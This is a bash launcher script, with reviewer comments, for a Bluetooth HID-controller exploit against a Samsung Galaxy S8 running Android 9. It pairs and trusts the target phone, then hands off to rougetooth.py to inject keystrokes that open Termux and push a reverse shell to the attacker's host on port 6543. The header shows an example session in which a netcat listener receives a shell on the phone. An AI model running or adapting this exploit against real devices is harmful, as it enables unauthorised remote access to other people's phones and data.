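#!/usr/bin/env bash
#
# Launcher for a Bluetooth HID-controller exploit against a Samsung Galaxy S8
# running Android 9.  The HID work itself lives in rougetooth.py (not part of
# this file); this wrapper only pairs the attacking host to the phone with
# bluetoothctl, scrapes the local adapter's MAC, and hands everything over.
#
# Example values:
#PHONE="08:AE:D6:6F:DD:F8"
#LOCAL_IP="10.0.2.2"
#
# oxagast / Marshall Whittaker
# 0day as of Apr 21, 2023
# if you get caught using this...
# In loving memory of Jason Reynolds aka Gemani
# Hope the computers are faster wherever you're at bro!
#
# Tested on a Samsung Galaxy S8 running Android 9
# Tested on Build PPR1.180610.001.G950USQU8DUJ1
# Termux must be installed on the device.
#
# Usage: $0 [PHONE BT MAC] [LOCAL IP]
#   PHONE BT MAC  Bluetooth address of the target phone (AA:BB:CC:DD:EE:FF)
#   LOCAL IP      address the phone can reach the attacker on; the reverse
#                 shell connects back here on port ${LOCAL_PORT} (6543)
#
# NOTE(review): "discoverable on" plus "pair/trust" leaves the target as a
# trusted device in the local BlueZ database after this script exits
# (undo with `bluetoothctl remove <MAC>`), and the host accepts an inbound
# shell on the listener port.  Run only against devices you are authorised
# to test, on a network you control.
#
# Example session (attacker host; output from the phone's Termux after the
# shell connected):
#
# [?] Samsung S8 android 9 HID controller exploit
# [?] Tested on Build PPR1.180610.001.G950USQU8DUJ1
# [?] In memory of Jason Reynolds / Gemani
#
# [*] Building reverse shell for 10.0.2.2:6543
# [*] Pairing to 08:AE:D6:6F:DD:F8
# [!] Paired 08:AE:D6:6F:DD:F8 to DC:53:60:6C:FC:B3
# [!] Go to another terminal and start a netcat listener on port to handle the shell!
# [*] Registered HID profile
# [!] Ready, waiting for connection from phone
# [*] Control channel connected to 08:AE:D6:6F:DD:F8
# [*] Interrupt channel connected to 08:AE:D6:6F:DD:F8
# [!] Building shell...
# [*] Trying to attain control over device...
# [*] Sending back to home screen...
# [*] Trying to pull up finder...
# [*] Trying to find termux...
# [*] Pushing shellcode now...
# listening on [any] 6543 ...
# ^C
# [!] Trying again...
# listening on [any] 6543 ...
# connect to [10.0.2.2] from nerkon [10.0.2.5] 51818
# ~ $ ls -al
# ls -al
# total 16
# drwx------ 3 u0_a466 u0_a466 4096 Apr 20 21:15 .
# drwxrwx--x 4 u0_a466 u0_a466 4096 Apr 20 21:12 ..
# -rw------- 1 u0_a466 u0_a466 1334 Apr 21 23:52 .bash_history
# drwx------ 2 u0_a466 u0_a466 4096 Apr 20 21:12 .termux
# ~ $ uname -a; id
# uname -a; id
# Linux localhost 4.4.153-17214672 #2 SMP PREEMPT Thu Oct 21 19:08:15 KST 2021 aarch64 Android
# uid=10466(u0_a466) gid=10466(u0_a466) groups=10466(u0_a466),3003(inet),9997(everybody),20466(u0_a466_cache),50466(all_a466)
# ~ $
#
# (The empty "port" in the transcript above is the bug fixed below: the
# original never assigned LOCAL_PORT, so the listener hint printed nothing.)

set -euo pipefail

# The port the reverse shell calls back to.  rougetooth.py is not given the
# port on its command line, so it is assumed to use 6543 (as in the example
# session above) — keep this in sync with rougetooth.py.
readonly LOCAL_PORT=6543

# Print the syntax hint to stderr and exit with a usage-error status.
usage() {
  printf 'Sorry, the syntax is %s [PHONE BT MAC] [LOCAL IP]\n' "$0" >&2
  exit 2
}

# Print a fatal diagnostic to stderr and exit 1.
die() {
  printf '[-] %s\n' "$*" >&2
  exit 1
}

# True if $1 is a colon-separated 48-bit Bluetooth (EUI-48) address.
# Untrusted argv ends up on bluetoothctl's stdin and on a python3 command
# line, so reject anything that is not a plain MAC before using it.
is_bt_mac() {
  [[ "$1" =~ ^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$ ]]
}

# Drive bluetoothctl non-interactively: power on, make the adapter
# discoverable, then pair/trust/connect to $1.  Prints every "Controller ..."
# MAC bluetoothctl mentions, one per line (several if the host has several
# adapters).  Exit status is that of the pipeline, so an empty result or a
# failed bluetoothctl is reported to the caller.
#
# printf is used instead of `echo "cmd\n\ncmd"` because bash's builtin echo
# does not expand \n (dash's does); the original script therefore only sent
# separate commands when run under some /bin/sh.  The blank line after each
# command mirrors the original.
pair_target() {
  local phone=$1
  printf '%s\n\n' \
    'power on' \
    'show' \
    'discoverable on' \
    "pair ${phone}" \
    "trust ${phone}" \
    "connect ${phone}" \
    | bluetoothctl \
    | grep Controller \
    | cut -d ' ' -f 2
}

# Entry point.  Arguments: $1 target Bluetooth MAC, $2 listener IP/host.
# Side effects: pairs and trusts the target on the local adapter, then
# execs rougetooth.py from the current directory.
main() {
  [[ $# -eq 2 ]] || usage
  local phone=$1
  local local_ip=$2
  local contr

  is_bt_mac "$phone" \
    || die "'${phone}' is not a Bluetooth MAC address (expected AA:BB:CC:DD:EE:FF)"
  # IPv4, IPv6 or a hostname; anything else (spaces, shell metacharacters)
  # is rejected rather than handed to rougetooth.py.
  [[ "$local_ip" =~ ^[A-Za-z0-9.:-]+$ ]] \
    || die "'${local_ip}' is not a usable listener address"
  command -v bluetoothctl >/dev/null 2>&1 || die "bluetoothctl not found (install bluez)"
  command -v python3 >/dev/null 2>&1 || die "python3 not found"
  # The original invoked rougetooth.py relative to the working directory;
  # fail early with a clear message instead of a python3 traceback.
  [[ -f rougetooth.py ]] \
    || die "rougetooth.py not found in $(pwd); run this from the directory that contains it"

  echo "[?] Samsung S8 android 9 HID controller exploit"
  echo "[?] Tested on Build PPR1.180610.001.G950USQU8DUJ1"
  echo "[?] In memory of Jason Reynolds / Gemani"
  echo
  echo "[*] Building reverse shell for ${local_ip}:${LOCAL_PORT}"
  echo "[*] Pairing to ${phone}"

  contr=$(pair_target "$phone") \
    || die "bluetoothctl did not report a local controller; is the adapter present and powered?"
  # Several adapters produce several lines; the original passed them all as
  # one argument.  Use the first so rougetooth.py gets a single MAC.
  contr=${contr%%$'\n'*}
  [[ -n "$contr" ]] || die "could not determine the local controller MAC from bluetoothctl output"

  # NOTE(review): only the controller MAC is checked here; whether the
  # pair/connect steps actually succeeded is not verified (bluetoothctl's
  # exit status does not reflect individual command failures).
  echo "[!] Paired ${phone} to ${contr}"
  echo "[!] Go to another terminal and start a netcat listener on port ${LOCAL_PORT} to handle the shell!"
  python3 rougetooth.py "${contr}" "${phone}" "${local_ip}"
}

main "$@"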